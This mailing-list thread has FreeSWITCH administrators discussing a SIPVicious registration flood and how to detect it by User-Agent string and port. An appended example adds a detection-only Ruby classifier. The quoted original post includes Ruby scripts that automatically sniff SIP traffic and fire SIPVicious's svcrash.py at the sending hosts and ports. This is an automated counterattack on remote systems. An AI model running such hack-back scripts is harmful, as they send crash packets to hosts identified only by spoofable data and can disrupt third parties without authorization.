[Freeswitch-users] SPIT attack and how to strike back

Peter Steinbach lists at telefaks.de
Fri Apr 22 00:33:13 MSD 2011


In this case, just change the below code to

search="your custom string"

As your external gateways like Asterisk usually connect to FreeSWITCH through
port 5080, you should even be able to identify Sipvicious by an Asterisk
User-Agent string arriving on port 5060.

Best regards
Peter


Kerem Erciyes schrieb:
> That would work until attacker defines a custom user-agent string.
> There have been reports of modified SipVicious code using Asterisk PBX
> as the agent.
>
> On Thu, Apr 21, 2011 at 4:13 AM, Denis Galvao <denisgalvao at gmail.com
> <mailto:denisgalvao at gmail.com>> wrote:
>
>     Nice! Thanks for sharing!
>
>     Denis
>
>     2011/4/20, Peter P GMX <Prometheus001 at gmx.net
>     <mailto:Prometheus001 at gmx.net>>:
>     > Hello all,
>     >
>     > I would like to share this with you as you may have also been affected
>     > by this threat.
>     >
>     > Yesterday we received a SPIT attack to our Freeswitch servers. We had
>     > about 50 register requests/sec. We noticed this as we saw a slight
>     > increase in the load of the Freeswitch servers. Fortunately Freeswitch
>     > can handle a huge amount of register requests so we had no denial of
>     > service.
>     >
>     > You can identify this attack by finding the following in the Register
>     > message:
>     >     User-Agent: friendly-scanner
>     >
>     > How to get rid of it:
>     > The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a
>     > nice tool "svcrash.py" which can send a malformed packet back to the
>     > attacker which crashes their own Sipvicious tool. You can issue this tool by
>     >   python svcrash.py -d <host of attacker> -p <port of attacker>
>     > You will need port 5060 on your machine to work. But there is also a
>     > workaround for that. svcrash.py will show how to overcome this if your
>     > port 5060 is not available.
>     > Download it here
>     > http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz and
>     > unpack it to a folder of your choice.
>     >
>     > I wrote a small Ruby script to send the packet back to a port range, as
>     > our attacker used some dozens of ports to send.
>     > Here is the script (install ruby first by "apt-get install ruby", e.g. on
>     > Debian based systems). Put it into the sipvicious directory as
>     > kill_ports.rb:
>     >
>     > #!/usr/bin/env ruby
>     > host=ARGV[0]
>     > start_port=ARGV[1].to_i
>     > end_port=ARGV[2].to_i
>     > start_port.upto(end_port) do |port|
>     >   cmd="python svcrash.py -d #{host} -p #{port}"
>     >   p cmd
>     >   erg=`#{cmd}`
>     >   p erg
>     > end
>     >
>     > You now can run it by
>     > ./kill_ports.rb <ip> <from_port> <to_port>
>     >
>     > By using this tool we got rid of most of the SPIT messages. But after a
>     > while they started again to attack us from different ports.
>     >
>     > The next step is: Why not automate this by trying to identify host and
>     > port automatically and send back the svcrash.py packet to the sender's port?
>     >
>     > First install the pcap library
>     >     apt-get install libpcap-dev libpcap-ruby
>     >
>     > Then I wrote the following tool to automate this; it makes use of the
>     > kill_ports.rb above:
>     > strike_back.rb:
>     >
>     > #!/usr/bin/env ruby
>     > # I used some code from http://snippets.dzone.com/posts/show/5931
>     > require 'pcaplet'
>     > require 'logger'
>     > require 'timeout'
>     > @timeout=3600 # max runtime: 1 hour
>     >
>     > @logfile='strike_back.log'
>     > # Logger subclass that echoes every message to stdout and writes it
>     > # to the logfile without the default severity/timestamp prefix
>     > class AuditLogger < Logger
>     >   def format_message(severity, timestamp, progname, msg)
>     >     puts msg
>     >     "#{msg}\n"
>     >   end
>     > end
>     >
>     > logfile = File.open(@logfile, 'a')
>     > LOGGER = AuditLogger.new(logfile)
>     > LOGGER.level = Logger::INFO
>     > search="friendly-scanner"
>     > puts "Searching for '#{search}' in SIP packets"
>     > $network = Pcaplet.new('-s 1500')
>     > $filter = Pcap::Filter.new('udp and dst port 5060', $network.capture)
>     > $network.add_filter($filter)
>     > puts "Logfile: #{@logfile}"
>     > puts "Starting capture..."
>     > begin
>     >   Timeout.timeout(@timeout) do # 3600 sec
>     >     for pkt in $network
>     >         header= "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")} #{pkt.src}:#{pkt.sport} => #{pkt.dst}:#{pkt.dport}"
>     >         if $filter =~ pkt
>     >             #puts "simple search"
>     >             if pkt.udp_data.index(search)
>     >               LOGGER.info "Kill Friendly scanner #{pkt.src} with Source Port #{pkt.sport}"
>     >               cmd="./kill_ports.rb #{pkt.src} #{pkt.sport} #{pkt.sport}"
>     >               erg=`#{cmd}`
>     >               puts erg
>     >               LOGGER.info header
>     >               LOGGER.info pkt.udp_data
>     >             end
>     >         end
>     >     end
>     >   end
>     > rescue Timeout::Error
>     >   logfile.flush
>     >   puts "Timeout - finished."
>     > end
>     >
>     > There may be a better way to code this, but at least it worked. After
>     > about 15min the number of attacks went to 0.
>     >
>     > Disclaimer: You can damage other systems by using these tools. So be
>     > careful and use at your own risk. Do not use this tool for attacking
>     > other systems!
>     >
>     > Best regards
>     > Peter
>     >
>     > _______________________________________________
>     > FreeSWITCH-users mailing list
>     > FreeSWITCH-users at lists.freeswitch.org
>     > <mailto:FreeSWITCH-users at lists.freeswitch.org>
>     > http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
>     > UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
>     > http://www.freeswitch.org
>     >
>
>     --
>     Sent from my mobile
>
>
>
>
>
> -- 
> Kerem Erciyes - Sistem Danismani
> http://keremerciyes.com
>
>


-- 
With kind regards
Peter Steinbach 

Telefaks Services GmbH
mailto:lists (att) telefaks.de
Internet: www.telefaks.de
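The thread suggests two detection signals: the literal "friendly-scanner" User-Agent (or a custom string, as Peter Steinbach notes), and a gateway-style User-Agent such as Asterisk arriving on port 5060 when real gateways are expected on 5080. The following Ruby script is an added example, not code from this thread or from the SIPVicious or FreeSWITCH projects; it only classifies and logs, it sends nothing back. It assumes endpoints register on 5060 and trusted gateways use 5080, and all sample datagrams it processes are constructed inline.

```ruby
#!/usr/bin/env ruby
# Added example, not code from the thread: a detection-only classifier for the
# two signals discussed above (a scanner User-Agent, and a gateway User-Agent
# such as Asterisk showing up on the endpoint port instead of the gateway port).
# Assumptions: endpoints register on 5060 and trusted gateways reach
# FreeSWITCH on 5080; all sample datagrams below are constructed.
require 'logger'

ENDPOINT_PORT  = 5060                  # phones register here; scanners hit this port
GATEWAY_PORT   = 5080                  # trusted gateways (e.g. Asterisk) connect here
SCANNER_AGENTS = ['friendly-scanner']  # add your custom search string here
GATEWAY_AGENTS = ['Asterisk']          # User-Agent strings only a gateway should carry

# Minimal SIP request parser: returns [method, headers]. Header names are
# lowercased; the first occurrence of a repeated header wins, which is enough
# for User-Agent. The blank line ends the header block (the body is ignored).
def parse_sip(payload)
  lines = payload.split(/\r?\n/)
  method = lines.shift.to_s.split(' ').first.to_s
  headers = {}
  lines.each do |line|
    break if line.empty?
    name, value = line.split(':', 2)
    next if value.nil?
    headers[name.strip.downcase] ||= value.strip
  end
  [method, headers]
end

# Classify one datagram by its payload and the destination port it hit.
# Returns [verdict, method, user_agent] where verdict is
#   :scanner  User-Agent contains a known scanner string
#   :suspect  gateway User-Agent on the endpoint port (should have been 5080)
#   :ok       anything else, including Asterisk arriving on GATEWAY_PORT
def classify(payload, dport)
  method, headers = parse_sip(payload)
  ua = headers['user-agent'].to_s
  verdict =
    if SCANNER_AGENTS.any? { |s| ua.include?(s) }
      :scanner
    elsif dport == ENDPOINT_PORT && GATEWAY_AGENTS.any? { |g| ua.include?(g) }
      :suspect
    else
      :ok
    end
  [verdict, method, ua]
end

# Run the classifier over [src, sport, dport, payload] tuples, log every hit,
# and return a per-source hit count: the input you would feed to a firewall
# rule or a fail2ban-style blocker.
def audit(datagrams, logger = Logger.new($stderr))
  offenders = Hash.new(0)
  datagrams.each do |src, sport, dport, payload|
    verdict, method, ua = classify(payload, dport)
    next if verdict == :ok
    offenders[src] += 1
    logger.warn("#{verdict}: #{src}:#{sport} -> :#{dport} #{method} User-Agent=#{ua.inspect}")
  end
  offenders
end

# Builds a constructed SIP request with the given method and User-Agent.
def sip_request(method, ua)
  "#{method} sip:pbx.example.net SIP/2.0\r\n" \
  "Via: SIP/2.0/UDP 192.0.2.1:5060;branch=z9hG4bK-example\r\n" \
  "From: <sip:1001@pbx.example.net>;tag=1\r\n" \
  "To: <sip:1001@pbx.example.net>\r\n" \
  "User-Agent: #{ua}\r\n" \
  "Content-Length: 0\r\n\r\n"
end

# Constructed sample traffic: [src, sport, dport, payload] (documentation addresses).
SAMPLE_DATAGRAMS = [
  ['192.0.2.10',   5060, ENDPOINT_PORT, sip_request('REGISTER', 'Softphone/1.0')],
  ['198.51.100.7', 5071, ENDPOINT_PORT, sip_request('REGISTER', 'friendly-scanner')],
  ['198.51.100.9', 5060, ENDPOINT_PORT, sip_request('REGISTER', 'Asterisk PBX')],
  ['203.0.113.5',  5060, GATEWAY_PORT,  sip_request('INVITE',   'Asterisk PBX 1.8')],
].freeze

if __FILE__ == $0
  audit(SAMPLE_DATAGRAMS).each { |src, hits| puts "#{src}: #{hits} suspicious request(s)" }
end
```

Only the fourth sample, Asterisk on the gateway port, passes as normal; the same User-Agent on 5060 is flagged because of the port convention rather than the string, which is what still catches a scanner that has changed its User-Agent to "Asterisk PBX" as Kerem Erciyes describes. Feeding the returned per-source counts into a firewall block list addresses the attack without sending anything to the remote host.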




